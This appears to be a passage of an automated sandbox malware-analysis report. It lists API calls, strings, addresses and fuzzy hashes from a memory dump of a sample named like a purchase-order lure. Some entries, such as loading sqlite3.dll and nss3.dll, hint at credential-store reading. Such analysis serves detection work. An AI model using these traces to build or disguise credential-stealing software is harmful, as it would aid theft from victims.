                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _ultoasprintf
                                                                                • String ID: %s %s %s
                                                                                • API String ID: 432394123-3850900253
                                                                                • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                • String ID: menu_%d
                                                                                • API String ID: 1129539653-2417748251
                                                                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                APIs
                                                                                Strings
                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _msizerealloc
                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                • API String ID: 2713192863-2134078882
                                                                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                APIs
                                                                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                • strrchr.MSVCRT ref: 00409808
                                                                                • _mbscat.MSVCRT ref: 0040981D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                • String ID: _lng.ini
                                                                                • API String ID: 3334749609-1948609170
                                                                                • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                APIs
                                                                                • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                • String ID: sqlite3.dll
                                                                                • API String ID: 1983510840-1155512374
                                                                                • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID: MZ@
                                                                                • API String ID: 1378638983-2978689999
                                                                                • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                APIs
                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString
                                                                                • String ID: A4@$Server Details
                                                                                • API String ID: 1096422788-4071850762
                                                                                • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                • memset.MSVCRT ref: 0042C932
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID:
                                                                                • API String ID: 438689982-0
                                                                                • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040849A
                                                                                • memset.MSVCRT ref: 004084D2
                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,7508EB20,?,00000000), ref: 0040858F
                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,7508EB20,?,00000000), ref: 004085BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 3110682361-0
                                                                                • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID:
                                                                                • API String ID: 3510742995-0
                                                                                • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                APIs
                                                                                  • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                • Opcode Fuzzy Hash: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040797A
                                                                                • free.MSVCRT ref: 0040799A
                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,75920A60,00407A43,00000001,?,00000000,75920A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                • free.MSVCRT ref: 004079BD
                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                • String ID:
                                                                                • API String ID: 3669619086-0
                                                                                • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59